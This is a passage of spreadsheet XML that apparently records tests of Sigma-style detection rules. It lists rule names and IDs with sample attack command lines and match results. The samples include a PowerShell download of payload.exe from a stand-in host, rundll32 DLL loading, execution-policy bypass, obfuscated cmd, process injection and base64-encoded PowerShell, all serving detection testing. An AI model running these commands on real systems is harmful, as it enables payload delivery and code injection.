          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3126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26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3127" ht="15.75" customHeight="1" s="42">
      <c r="A3127" s="44" t="n"/>
      <c r="B3127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3127" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3127" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3127" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I312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127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3128" ht="15.75" customHeight="1" s="42">
      <c r="A3128" s="44" t="n"/>
      <c r="B3128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3128" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3128" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3128" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F3128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3128" s="43" t="n"/>
      <c r="J3128" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3128" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3129" ht="15.75" customHeight="1" s="42">
      <c r="A3129" s="44" t="n"/>
      <c r="B3129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3129" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3129" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3129" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3129" s="44" t="n"/>
      <c r="J3129" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3129" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3130" ht="15.75" customHeight="1" s="42">
      <c r="A3130" s="44" t="n"/>
      <c r="B3130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3130" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3130" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3130" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F3130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3130" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J3130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3131" ht="15.75" customHeight="1" s="42">
      <c r="A3131" s="44" t="n"/>
      <c r="B3131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3131" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3131" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3131" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F3131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3131" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J3131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3132" ht="15.75" customHeight="1" s="42">
      <c r="A3132" s="44" t="n"/>
      <c r="B3132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3132" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3132" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3132" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3132" s="43" t="n"/>
      <c r="J3132" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3132" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3133" ht="15.75" customHeight="1" s="42">
      <c r="A3133" s="44" t="n"/>
      <c r="B3133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3133" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3133" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3133" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3133" s="44" t="n"/>
      <c r="J3133" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3133" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3134" ht="15.75" customHeight="1" s="42">
      <c r="A3134" s="44" t="n"/>
      <c r="B3134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3134" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3134" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3134" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3134" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3135" ht="15.75" customHeight="1" s="42">
      <c r="A3135" s="44" t="n"/>
      <c r="B3135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3135" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3135" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3135" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3135" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3136" ht="15.75" customHeight="1" s="42">
      <c r="A3136" s="43" t="n"/>
      <c r="B3136" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3136" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3136" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3136" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3136" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3136" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3136" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3136" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3137" ht="15.75" customHeight="1" s="42">
      <c r="A3137" s="44" t="n"/>
      <c r="B3137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3137" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3137" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3137" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3137" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3137" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3137" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3138" ht="15.75" customHeight="1" s="42">
      <c r="A3138" s="43" t="n"/>
      <c r="B3138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3138" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3138" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3138" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3138" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3139" ht="15.75" customHeight="1" s="42">
      <c r="A3139" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3139" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_win_api_access</t>
        </is>
      </c>
      <c r="C3139" s="43" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine</t>
        </is>
      </c>
      <c r="D3139" s="43" t="inlineStr">
        <is>
          <t>ba3f5c1b-6272-4119-9dbd-0bc8d21c2702</t>
        </is>
      </c>
      <c r="E3139" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\AtomicRedTeam\atomics\T1055\bin\x64\CreateRemoteThread.exe %temp%\crt.exe &amp;&amp; %temp%\crt.exe -pid 11728 -debug</t>
        </is>
      </c>
      <c r="F3139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3139" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3139" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3139" s="43" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702)</t>
        </is>
      </c>
      <c r="J3139" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3139" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3140" ht="15.75" customHeight="1" s="42">
      <c r="A3140" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3140" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3140" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3140" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3140" s="44" t="n"/>
      <c r="J3140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3140" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3141" ht="15.75" customHeight="1" s="42">
      <c r="A3141" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3141" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3141" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3141" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3141" s="43" t="n"/>
      <c r="J3141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3141" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3142" ht="15.75" customHeight="1" s="42">
      <c r="A3142" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3142" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3142" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3142" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3142" s="43" t="n"/>
      <c r="J3142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3142" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3143" ht="15.75" customHeight="1" s="42">
      <c r="A3143" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3143" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3143" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3143" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3143" s="43" t="n"/>
      <c r="J3143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3143" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3144" ht="15.75" customHeight="1" s="42">
      <c r="A3144" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3144" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3144" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3144" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3144" s="44" t="n"/>
      <c r="J3144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3144" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3145" ht="15.75" customHeight="1" s="42">
      <c r="A3145" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3145" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3145" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3145" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3145" s="44" t="n"/>
      <c r="J3145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3145" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3146" ht="15.75" customHeight="1" s="42">
      <c r="A3146" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3146" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3146" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3146" s="44" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3146" s="43" t="n"/>
      <c r="J3146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3146" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3147" ht="15.75" customHeight="1" s="42">
      <c r="A3147" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3147" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3147" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3147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47" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3147" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3148" ht="15.75" customHeight="1" s="42">
      <c r="A3148" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3148" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3148" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3148" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F3148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3148" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3148" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3149" ht="15.75" customHeight="1" s="42">
      <c r="A3149" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3149" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3149" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3149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49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3149" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3149" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3150" ht="15.75" customHeight="1" s="42">
      <c r="A3150" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3150" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3150" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3150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50" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3150" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3150" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3151" ht="15.75" customHeight="1" s="42">
      <c r="A3151" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3151" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3151" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3151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51" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3151" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3152" ht="15.75" customHeight="1" s="42">
      <c r="A3152" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3152" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3152" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3152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52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3152" s="44" t="b">
        <v>0</v>
      </c>
